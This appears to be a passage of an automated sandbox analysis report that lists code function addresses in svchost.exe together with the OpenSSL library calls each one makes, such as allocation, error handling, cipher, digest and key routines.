    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA16B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,49_2_00007FF8B7EA16B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4D68B X509_VERIFY_PARAM_free,BIO_pop,BIO_free,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,OSSL_STACK_OF_X509_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,BIO_free_all,BIO_free_all,CRYPTO_free,49_2_00007FF8B7E4D68B
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB1650 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7EB1650
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E53650 CRYPTO_THREAD_unlock,49_2_00007FF8B7E53650
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E99620 CRYPTO_malloc,ERR_new,ERR_set_debug,49_2_00007FF8B7E99620
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9D5F0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,49_2_00007FF8B7E9D5F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E6B5F0 CRYPTO_free,49_2_00007FF8B7E6B5F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9B5E0 CRYPTO_free,49_2_00007FF8B7E9B5E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E335C8 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,49_2_00007FF8B7E335C8
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E315D0 CRYPTO_free,49_2_00007FF8B7E315D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E875D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E875D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E575B0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,49_2_00007FF8B7E575B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E995A0 CRYPTO_free,49_2_00007FF8B7E995A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9B590 CRYPTO_free,49_2_00007FF8B7E9B590
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E39590 CRYPTO_free,CRYPTO_memdup,49_2_00007FF8B7E39590
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EBB550 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7EBB550
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E55550 CRYPTO_malloc,CRYPTO_new_ex_data,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,49_2_00007FF8B7E55550
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E99540 OPENSSL_cleanse,CRYPTO_free,49_2_00007FF8B7E99540
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E45500 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,49_2_00007FF8B7E45500
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3B500 CRYPTO_free,49_2_00007FF8B7E3B500
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9D4E0 ERR_new,ERR_set_debug,CRYPTO_free,49_2_00007FF8B7E9D4E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA74E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7EA74E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E534E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,49_2_00007FF8B7E534E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E6B4B0 CRYPTO_zalloc,49_2_00007FF8B7E6B4B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9B4A0 CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E9B4A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5D440 CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,CONF_parse_list,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E5D440
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA1430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,49_2_00007FF8B7EA1430
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9B420 CRYPTO_free,49_2_00007FF8B7E9B420
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA93A0 ERR_new,ERR_set_debug,CRYPTO_clear_free,49_2_00007FF8B7EA93A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E313A0 CRYPTO_free,49_2_00007FF8B7E313A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E83380 CRYPTO_free,49_2_00007FF8B7E83380
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EAB370 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,RAND_bytes_ex,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,49_2_00007FF8B7EAB370
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB5360 ERR_new,i2d_PUBKEY,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,49_2_00007FF8B7EB5360
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3D360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,49_2_00007FF8B7E3D360
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E47360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,49_2_00007FF8B7E47360
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5D310 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E5D310
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E592F0 CRYPTO_realloc,memcpy,49_2_00007FF8B7E592F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E6B2D0 CRYPTO_free,49_2_00007FF8B7E6B2D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E532C0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,49_2_00007FF8B7E532C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB92A0 EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7EB92A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7F290 CRYPTO_realloc,49_2_00007FF8B7E7F290
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E35240 CRYPTO_zalloc,CRYPTO_free,49_2_00007FF8B7E35240
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3321D X509_VERIFY_PARAM_get0_peername,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,X509_VERIFY_PARAM_get0_peername,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,49_2_00007FF8B7E3321D
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E73220 CRYPTO_zalloc,CRYPTO_free,49_2_00007FF8B7E73220
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E51210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,49_2_00007FF8B7E51210
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E83200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free,49_2_00007FF8B7E83200
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E651E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,49_2_00007FF8B7E651E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E851D0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,ERR_new,ERR_set_debug,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_MD_up_ref,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_free,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,CRYPTO_free,49_2_00007FF8B7E851D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E85190 BIO_free,CRYPTO_free,49_2_00007FF8B7E85190
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EAB140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,49_2_00007FF8B7EAB140
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5D140 CRYPTO_free,CRYPTO_malloc,49_2_00007FF8B7E5D140
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E81127 CRYPTO_realloc,49_2_00007FF8B7E81127
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E49120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,49_2_00007FF8B7E49120
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E6D100 CRYPTO_free,49_2_00007FF8B7E6D100
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E440E0 CRYPTO_get_ex_data,49_2_00007FF8B7E440E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E640E0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,49_2_00007FF8B7E640E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7C0D0 CRYPTO_free,49_2_00007FF8B7E7C0D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA0070 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,49_2_00007FF8B7EA0070
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E54060 CRYPTO_free,CRYPTO_memdup,49_2_00007FF8B7E54060
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5A030 OSSL_PROVIDER_do_all,CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,49_2_00007FF8B7E5A030
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E70010 CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_free,49_2_00007FF8B7E70010
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E72000 CRYPTO_free,49_2_00007FF8B7E72000
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3BFF0 CRYPTO_THREAD_run_once,49_2_00007FF8B7E3BFF0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E97FE0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_mark,ERR_clear_last_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,49_2_00007FF8B7E97FE0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7FFD0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E7FFD0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EBBFA0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,49_2_00007FF8B7EBBFA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E65FA0 CRYPTO_realloc,49_2_00007FF8B7E65FA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E39F90 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,49_2_00007FF8B7E39F90
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3DF70 CRYPTO_malloc,BIO_snprintf,49_2_00007FF8B7E3DF70
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA1F30 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7EA1F30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E59F30 OSSL_PROVIDER_do_all,CRYPTO_malloc,memcpy,49_2_00007FF8B7E59F30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E53F00 CRYPTO_free,CRYPTO_strdup,49_2_00007FF8B7E53F00
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E31EC0 CRYPTO_free,49_2_00007FF8B7E31EC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E87EC0 CRYPTO_zalloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,49_2_00007FF8B7E87EC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5DEA0 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,49_2_00007FF8B7E5DEA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E97E90 CRYPTO_malloc,COMP_expand_block,49_2_00007FF8B7E97E90
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA5E80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,memcpy,EVP_MD_get0_name,EVP_MD_is_a,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,49_2_00007FF8B7EA5E80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E71E70 CRYPTO_realloc,49_2_00007FF8B7E71E70
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E69E60 OPENSSL_LH_free,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,49_2_00007FF8B7E69E60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E53E50 CRYPTO_free,CRYPTO_memdup,49_2_00007FF8B7E53E50
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E85E20 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,49_2_00007FF8B7E85E20
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3DE10 i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E3DE10
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E83E10 CRYPTO_malloc,CRYPTO_free,49_2_00007FF8B7E83E10
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E59E00 CRYPTO_zalloc,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,49_2_00007FF8B7E59E00
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9DDE0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,49_2_00007FF8B7E9DDE0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EABDB0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_is_a,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,49_2_00007FF8B7EABDB0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E35DB0 CRYPTO_malloc,49_2_00007FF8B7E35DB0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA9DA6 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,49_2_00007FF8B7EA9DA6
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E37DA0 CRYPTO_free,49_2_00007FF8B7E37DA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E53D70 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,49_2_00007FF8B7E53D70
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7BD60 CRYPTO_zalloc,49_2_00007FF8B7E7BD60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E85D30 CRYPTO_free,49_2_00007FF8B7E85D30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA9CC1 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_CTX_copy_ex,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,49_2_00007FF8B7EA9CC1
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E59CC0 EVP_MAC_CTX_free,CRYPTO_free,49_2_00007FF8B7E59CC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA9CAA ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,49_2_00007FF8B7EA9CAA
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E6FCB0 CRYPTO_free,49_2_00007FF8B7E6FCB0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,49_2_00007FF8B7E9FC90
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA1C70 CRYPTO_realloc,49_2_00007FF8B7EA1C70
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E31C50 CRYPTO_zalloc,49_2_00007FF8B7E31C50
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E39C50 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,49_2_00007FF8B7E39C50
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB9C40 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7EB9C40
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E33C40 ERR_clear_error,ERR_new,ERR_set_debug,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,SetLastError,BIO_read,BIO_ADDR_new,BIO_ctrl,BIO_ctrl,BIO_ADDR_free,BIO_write,BIO_ctrl,BIO_test_flags,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_ctrl,BIO_ADDR_clear,BIO_write,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_test_flags,BIO_ADDR_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,49_2_00007FF8B7E33C40
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E83C30 CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E83C30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4BC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,49_2_00007FF8B7E4BC10
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E37BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7E37BEE
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E31BE0 CRYPTO_zalloc,49_2_00007FF8B7E31BE0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA9B4A memset,CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,49_2_00007FF8B7EA9B4A
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E57B50 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,ERR_new,ERR_set_debug,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,49_2_00007FF8B7E57B50
